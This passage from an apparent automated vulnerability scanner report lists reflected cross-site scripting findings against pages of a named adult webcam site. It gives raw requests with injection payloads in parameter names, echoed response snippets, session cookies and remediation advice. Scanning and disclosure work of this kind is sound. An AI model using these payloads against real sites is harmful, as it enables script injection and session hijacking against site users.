Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:34 GMT
Connection: close
Content-Length: 53900
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/role-play/?43819"><a>7fb20b0957a=1">
...[SNIP]...

2.108. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:44 GMT
Connection: close
Content-Length: 54077
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d
...[SNIP]...

2.109. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:02 GMT
Connection: close
Content-Length: 29751
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.110. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 29898
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.111. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:28 GMT
Connection: close
Content-Length: 25736
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.112. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:18 GMT
Connection: close
Content-Length: 25588
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.113. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 26074
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.114. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:07 GMT
Connection: close
Content-Length: 25926
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.115. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; 